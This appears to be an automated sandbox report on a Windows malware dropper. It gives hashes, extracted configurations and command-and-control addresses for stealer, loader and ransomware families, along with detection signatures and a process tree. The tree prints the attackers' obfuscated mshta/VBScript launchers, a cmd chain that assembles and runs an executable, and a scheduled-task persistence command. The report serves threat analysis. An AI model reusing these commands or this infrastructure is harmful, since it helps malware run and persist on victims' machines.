Resubmissions

23-10-2021 15:52

211023-tbkbesdcfm 10

22-10-2021 17:40

211022-v8trsscggr 10

22-10-2021 15:55

211022-tc9ygacgan 10

22-10-2021 14:38

211022-rz1bfabgb8 10

Analysis

  • max time kernel
    1180s
  • max time network
    2706s
  • platform
    windows10_x64
  • resource
    win10-de-20211014
  • submitted
    22-10-2021 15:55

General

  • Target

    Fri051e1e7444.exe

  • Size

    403KB

  • MD5

    b4c503088928eef0e973a269f66a0dd2

  • SHA1

    eb7f418b03aa9f21275de0393fcbf0d03b9719d5

  • SHA256

    2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2

  • SHA512

    c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

Malware Config

Extracted

Family

vidar

Version

41.5

Botnet

937

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    937

Extracted

Family

smokeloader

Version

2020

C2

http://gejajoo7.top/

http://sysaheu9.top/

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/

rc4.i32
rc4.i32
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

C2

205.185.119.191:60857

Extracted

Family

vidar

Version

41.5

Botnet

903

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    903

Extracted

Family

raccoon

Botnet

7c9b4504a63ed23664e38808e65948379b790395

Attributes
  • url4cnc

    http://telegka.top/capibar

    http://telegin.top/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Extracted

Family

icedid

Campaign

1875681804

C2

enticationmetho.ink

Extracted

Family

djvu

C2

http://rlrz.org/lancer

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE DCRAT Activity (GET)

    suricata: ET MALWARE DCRAT Activity (GET)

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2

    suricata: ET MALWARE Win32/Kelihos.F exe Download 2

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • Blocklisted process makes network request 10 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 21 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    1⤵
    • Suspicious use of SetThreadContext
    PID:2248
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:5856
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2676
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2652
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2580
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2408
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2376
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1768
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1372
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1340
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1192
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1108
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1044
                        • C:\Users\Admin\AppData\Roaming\bfusvrr
                          C:\Users\Admin\AppData\Roaming\bfusvrr
                          2⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:8148
                        • C:\Users\Admin\AppData\Roaming\bwusvrr
                          C:\Users\Admin\AppData\Roaming\bwusvrr
                          2⤵
                            PID:8176
                            • C:\Users\Admin\AppData\Roaming\bwusvrr
                              C:\Users\Admin\AppData\Roaming\bwusvrr
                              3⤵
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:8908
                          • \??\c:\windows\system\svchost.exe
                            c:\windows\system\svchost.exe
                            2⤵
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            PID:7908
                          • C:\Users\Admin\AppData\Roaming\uiusvrr
                            C:\Users\Admin\AppData\Roaming\uiusvrr
                            2⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4388
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:5872
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              3⤵
                                PID:6012
                                • C:\Windows\SysWOW64\schtasks.exe
                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:7948
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              2⤵
                                PID:1708
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  3⤵
                                    PID:6760
                                • \??\c:\windows\system\svchost.exe
                                  c:\windows\system\svchost.exe
                                  2⤵
                                    PID:9064
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                      PID:9056
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        3⤵
                                          PID:6752
                                      • C:\Users\Admin\AppData\Roaming\uiusvrr
                                        C:\Users\Admin\AppData\Roaming\uiusvrr
                                        2⤵
                                          PID:2124
                                        • C:\Users\Admin\AppData\Roaming\bfusvrr
                                          C:\Users\Admin\AppData\Roaming\bfusvrr
                                          2⤵
                                            PID:2788
                                          • C:\Users\Admin\AppData\Roaming\bwusvrr
                                            C:\Users\Admin\AppData\Roaming\bwusvrr
                                            2⤵
                                              PID:5288
                                              • C:\Users\Admin\AppData\Roaming\bwusvrr
                                                C:\Users\Admin\AppData\Roaming\bwusvrr
                                                3⤵
                                                  PID:7980
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                2⤵
                                                  PID:6004
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    3⤵
                                                      PID:4232
                                                  • C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe
                                                    C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task
                                                    2⤵
                                                      PID:6552
                                                      • C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe
                                                        C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task
                                                        3⤵
                                                          PID:8188
                                                      • \??\c:\windows\system\svchost.exe
                                                        c:\windows\system\svchost.exe
                                                        2⤵
                                                          PID:6692
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          2⤵
                                                            PID:8916
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              3⤵
                                                                PID:6600
                                                            • C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe
                                                              C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task
                                                              2⤵
                                                                PID:4404
                                                                • C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe
                                                                  C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task
                                                                  3⤵
                                                                    PID:512
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  2⤵
                                                                    PID:5288
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      3⤵
                                                                        PID:1724
                                                                    • C:\Users\Admin\AppData\Roaming\bwusvrr
                                                                      C:\Users\Admin\AppData\Roaming\bwusvrr
                                                                      2⤵
                                                                        PID:8904
                                                                        • C:\Users\Admin\AppData\Roaming\bwusvrr
                                                                          C:\Users\Admin\AppData\Roaming\bwusvrr
                                                                          3⤵
                                                                            PID:732
                                                                        • C:\Users\Admin\AppData\Roaming\bfusvrr
                                                                          C:\Users\Admin\AppData\Roaming\bfusvrr
                                                                          2⤵
                                                                            PID:4608
                                                                          • \??\c:\windows\system\svchost.exe
                                                                            c:\windows\system\svchost.exe
                                                                            2⤵
                                                                              PID:5124
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              2⤵
                                                                                PID:1872
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  3⤵
                                                                                    PID:8888
                                                                                • C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe
                                                                                  C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task
                                                                                  2⤵
                                                                                    PID:7888
                                                                                    • C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe
                                                                                      C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task
                                                                                      3⤵
                                                                                        PID:5964
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      2⤵
                                                                                        PID:8940
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          3⤵
                                                                                            PID:1580
                                                                                        • C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe
                                                                                          C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task
                                                                                          2⤵
                                                                                            PID:6736
                                                                                            • C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe
                                                                                              C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e\8EED.exe --Task
                                                                                              3⤵
                                                                                                PID:8016
                                                                                            • \??\c:\windows\system\svchost.exe
                                                                                              c:\windows\system\svchost.exe
                                                                                              2⤵
                                                                                                PID:2096
                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                2⤵
                                                                                                  PID:8804
                                                                                                • C:\Users\Admin\AppData\Roaming\bwusvrr
                                                                                                  C:\Users\Admin\AppData\Roaming\bwusvrr
                                                                                                  2⤵
                                                                                                    PID:2948
                                                                                                    • C:\Users\Admin\AppData\Roaming\bwusvrr
                                                                                                      C:\Users\Admin\AppData\Roaming\bwusvrr
                                                                                                      3⤵
                                                                                                        PID:4632
                                                                                                    • C:\Users\Admin\AppData\Roaming\bfusvrr
                                                                                                      C:\Users\Admin\AppData\Roaming\bfusvrr
                                                                                                      2⤵
                                                                                                        PID:3572
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"
                                                                                                      1⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Modifies system certificate store
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1336
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\gckOBeKwEc_9Tb1WLDr_o55o.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\gckOBeKwEc_9Tb1WLDr_o55o.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:3816
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\6RfiwzZkIPJvopWxqd4ouGmM.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\6RfiwzZkIPJvopWxqd4ouGmM.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2332
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                          3⤵
                                                                                                            PID:2236
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /f /im chrome.exe
                                                                                                              4⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:5096
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\OwrOZbTk9HrZsEFTj0c7paTs.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\OwrOZbTk9HrZsEFTj0c7paTs.exe"
                                                                                                          2⤵
                                                                                                            PID:2388
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\ZKiBxX_lZY4IIzpkXK7L8Xle.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\ZKiBxX_lZY4IIzpkXK7L8Xle.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:1268
                                                                                                            • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                              "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4352
                                                                                                            • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                              "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4456
                                                                                                            • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                              "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4556
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\ADP8vL2SLdGPH8L7FyA9nk0u.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\ADP8vL2SLdGPH8L7FyA9nk0u.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1316
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 1080
                                                                                                              3⤵
                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                              • Program crash
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2288
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\NpQFFR5PLBhAmQZ0HxCbwNxm.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\NpQFFR5PLBhAmQZ0HxCbwNxm.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2760
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 896
                                                                                                              3⤵
                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                              • Program crash
                                                                                                              PID:2236
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2080
                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                              "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                              3⤵
                                                                                                                PID:4808
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\E8SL1DWYDQfbr15Eley5KWls.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                  4⤵
                                                                                                                    PID:1300
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                      8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3540
                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                        6⤵
                                                                                                                          PID:4852
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                            7⤵
                                                                                                                              PID:600
                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                            "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                            6⤵
                                                                                                                              PID:5636
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                7⤵
                                                                                                                                  PID:5720
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                    8⤵
                                                                                                                                      PID:5076
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                      8⤵
                                                                                                                                        PID:1496
                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                        8⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:4204
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill -im "E8SL1DWYDQfbr15Eley5KWls.exe" -F
                                                                                                                                  5⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:4312
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\zt3fotSIgq8mlNObpN9zV4Ri.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\zt3fotSIgq8mlNObpN9zV4Ri.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            PID:3260
                                                                                                                            • C:\Users\Admin\Documents\1NfON6dm6F_QWOrKdYH7I84U.exe
                                                                                                                              "C:\Users\Admin\Documents\1NfON6dm6F_QWOrKdYH7I84U.exe"
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:4760
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\nksQBGgk4aKK7MdTUg8YET4X.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\nksQBGgk4aKK7MdTUg8YET4X.exe"
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2476
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\HpQtObz62dT6szj1j12odrbQ.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\HpQtObz62dT6szj1j12odrbQ.exe"
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:2628
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\uWM88AHiVsIghHqLufZXuMxT.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\uWM88AHiVsIghHqLufZXuMxT.exe"
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4408
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                  5⤵
                                                                                                                                    PID:5500
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                      6⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:5988
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\KUuRjtWwC9mcEybDnxKPC2fz.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\KUuRjtWwC9mcEybDnxKPC2fz.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
